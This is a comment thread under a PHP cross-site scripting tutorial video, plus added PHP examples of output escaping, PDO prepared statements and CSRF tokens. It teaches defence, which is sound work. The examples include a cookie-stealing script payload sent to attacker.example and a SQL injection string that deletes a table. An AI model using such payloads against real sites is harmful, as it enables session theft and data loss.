PHP Security: XSS (Cross-site Scripting)

  • Added 5 Oct 2015
  • Want more? Explore the library at www.codecourse.com/lessons
    Official site: www.codecourse.com
    Twitter: teamcodecourse

Comments • 39

  • @cavking1, 1 year ago

    You taught me PHP over ten years ago and I still use it today. Thanks, Alex.

  • @MartinKuikHilversum, 7 years ago

    Nice work bro, I was searching for this, you helped me a lot!

  • @IgorAherne, 7 years ago

    Damn it, I am writing a database, and just whistle in fear at the end of each video.
    For example, where you expose the prevented JavaScript, it's actually scary how it would go through so quickly and unnoticed. Thanks!

  • @AlexanderGarzon, 8 years ago

    Simple, but quite precise. Nice video.

  • @zezont4, 8 years ago, +1

    Really important and easy.
    Thank you

  • @sanauwari, 6 years ago

    Finally got what I was looking for 😊 Thank you very much.

  • @victhour, 8 years ago, +1

    Man! Like you're reading my mind, nice tutorial.

  • @TeeWoTeebay, 8 years ago

    Nice and easy! Thanks Alex.

  • @mysterion4105, 8 years ago

    Thanks for the video Alex, hope you upload other kinds of attacks.

  • @gungorbudak, 8 years ago

    Can anybody tell me what MySQL software here is to see and edit table rows?

  • @MohamedAliUrd, 8 years ago, +2

    You are the best.

  • @tsochetra, 8 years ago

    Can I escape the value before inserting it into the DB?

  • @SinghatehAlagie, 6 years ago

    Hello sir, I came across your video while I was trying to fix my cookie problem. When I inserted my cookies into the database and I want to see them all in my cookie model, it shows "your cart is empty" while my database already has some products inserted into it. Could you please help me to fix that, or I can even send you the code to check it for me if necessary? Thank you so much, waiting to hear from you as soon as possible.

  • @bcrypted, 7 years ago

    Does this still apply? Or what will be the equivalent from 2015 to the current year, 2017?
    What version of PHP are you using in these videos?

  • @WouterDijkstra3119, 8 years ago

    Why not sanitize the data before entering the DB? I know you said something about it, but if you use htmlspecialchars or htmlentities before entering the DB, I don't see why not do it before rather than after?

    • @aidantwoods, 8 years ago

      +Wouter Dijkstra If you sanitise the data before it reaches the DB, then messing up once will leave you vulnerable everywhere the malicious data is displayed. If you sanitise as things come out, then you'll limit your exposure to where you messed up.
      Additionally, if you sanitise before then a screw up is harder to fix, because your security model relies on the database being trusted not to have executable html inside it. A single screw up invalidates that assumption, and you'd have to find every piece of malicious data in the DB before you'd be safe - even after fixing the flawed form.
      If you sanitise after, then to remove an exploit all you have to do is fix the vulnerable page. Then it won't matter if there is malicious html in the DB, because it won't be able to execute.
      When outputting data, just ask yourself whether the data really needs the ability to execute as html. If the answer is no, run it through the sanitisation function.

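An added example, not code from the video or from the commenters above, of the point made in the reply: the row is stored exactly as submitted and escaped only at the moment it is written into HTML, and the escaping function has to match the output context (HTML text and attributes versus a `<script>` block). The helper names `e()` and `js()`, the `$row` sample and the attacker hostname are constructed for this example.

```php
<?php
// Added example (not from the Codecourse video): escape on output, per context.
declare(strict_types=1);

// Escape a string for HTML text content or a double/single-quoted attribute.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE avoids returning "" on bad UTF-8.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Escape a value for use as a JavaScript literal inside a <script> block.
// JSON_HEX_TAG turns < and > into \u003C \u003E, so "</script>" cannot close the block.
function js($value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed sample: a stored-XSS payload exactly as it would sit in the DB.
$row = [
    'username' => 'alice',
    'comment'  => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
];

// Vulnerable: raw interpolation, the payload executes in every visitor's browser.
function renderVulnerable(array $row): string
{
    return "<p>{$row['username']}: {$row['comment']}</p>";
}

// Fixed: escape at the point of output; the payload is rendered as visible text.
function renderSafe(array $row): string
{
    return '<p>' . e($row['username']) . ': ' . e($row['comment']) . '</p>'
         . '<input type="text" value="' . e($row['comment']) . '">'
         . '<script>var lastComment = ' . js($row['comment']) . ';</script>';
}

// Quick check a reviewer can apply to rendered output: no raw <script> tag survives.
function containsRawScriptTag(string $html): bool
{
    return stripos($html, '<script>document') !== false;
}

echo renderVulnerable($row), PHP_EOL;
echo renderSafe($row), PHP_EOL;
var_dump(containsRawScriptTag(renderVulnerable($row))); // bool(true)
var_dump(containsRawScriptTag(renderSafe($row)));       // bool(false)
```

If the stored HTML needs to be fixed later, only the rendering code changes; the rows can stay as they are, which is exactly the advantage the reply describes. Note that `htmlspecialchars` alone is not enough for a URL (`href`) or CSS context; those need their own encoders.
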
  • @NoJackals, 8 years ago

    Why are the other videos of the PHP security list private?

  • @royhonders, 8 years ago

    What software for the database is he/are you using?

    • @chillybinvids, 8 years ago, +1

      +Veslav I believe he uses Sequel Pro. If using Windows try HeidiSQL.

  • @hamedtech7260, 6 years ago

    Very helpful :)

  • @Dexter101x, 7 years ago

    What if they don't use cookie?

  • @ialimijororakotoniaina3274

    Very helpful.

  • @MrAliiraqi1, 8 years ago

    Hi Alex, what editor are you using?

  • @abdullahislam, 8 years ago, +1

    So what about scripts we embed on our sites, like a Facebook like box or a YouTube embed? Can they potentially also steal cookies?

  • @meksaldi, 8 years ago

    +Codecourse Noticed that in the functions.php file you did not close the ?> tag at the end, is this the way it should be?

    • @derkjna, 8 years ago, +2

      +meksaldi If a PHP file is included inside another PHP file it isn't required to close PHP. Closing PHP while it is included in another file could actually give you an error.

    • @meksaldi, 8 years ago

      Exactly what I thought :) Thanks for the verification.

    • @Sonnentau1, 8 years ago, +2

      You should use 'require_once' anyway... that's better and safer.

    • @meksaldi, 8 years ago

      +Manolis Agkopian OK Manoli, thank you very much :D

  • 5 years ago

    Time when Alex was so underrated. 'Member?

  • @devexe3545, 8 years ago

    ORM or PDO: this will protect you from SQL injection.
    Twig or Smarty template framework: this will protect you from XSS.
    Token: this will protect you from CSRF.

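An added example, not from the video or from devexe3545, of the first and third items in that list: a PDO prepared statement that stores a constructed injection payload as plain data, and a CSRF token generated with `random_bytes` and checked with `hash_equals`. It assumes PHP with the `pdo_sqlite` extension so it can run against an in-memory database; the function names `csrfToken()` and `csrfValid()`, the `$session` array standing in for `$_SESSION`, and the attacker input are the example's own.

```php
<?php
// Added example: PDO prepared statement against SQL injection, CSRF token with hash_equals.
declare(strict_types=1);

// In-memory SQLite so the example runs offline (assumes the pdo_sqlite extension).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT NOT NULL)');

// Constructed attacker input: closes the string and the statement, then appends its own.
$input = "x'); DELETE FROM comments; --";

// Vulnerable pattern (kept as a comment, do not run): the input becomes SQL text, so the
// resulting string is  INSERT ... VALUES ('x'); DELETE FROM comments; --')
// $pdo->exec("INSERT INTO comments (body) VALUES ('$input')");

// Prepared statement: the value is bound as data and is never parsed as SQL.
$stmt = $pdo->prepare('INSERT INTO comments (body) VALUES (:body)');
$stmt->execute([':body' => $input]);

$stored = $pdo->query('SELECT body FROM comments')->fetchColumn();
var_dump($stored === $input); // bool(true): stored literally, table still intact

// CSRF token: created once per session from a CSPRNG, compared in constant time.
function csrfToken(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function csrfValid(array $session, ?string $submitted): bool
{
    return is_string($submitted)
        && isset($session['csrf'])
        && hash_equals($session['csrf'], $submitted);
}

$session = [];                       // stand-in for $_SESSION in this example
$token   = csrfToken($session);

// Hidden field to emit inside the form; escaped on output like any other value.
$field = '<input type="hidden" name="csrf" value="'
       . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '">';

var_dump(csrfValid($session, $token));   // bool(true): the form's own token
var_dump(csrfValid($session, 'forged')); // bool(false): attacker-supplied value
var_dump(csrfValid($session, null));     // bool(false): field missing from the POST
```

The second item in the list is the same output escaping shown earlier in this thread: Twig's autoescape applies `htmlspecialchars`-style encoding when a variable is rendered, so it is not repeated here. In a real handler the `$session` array is `$_SESSION`, and the check runs before any state-changing work on the POST request.
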
  • @OJeyjunior, 3 years ago

    SAMY IS MY HERO

  • @JasonCtutorials, 8 years ago

    This won't work on modern websites for PHP. LOLs.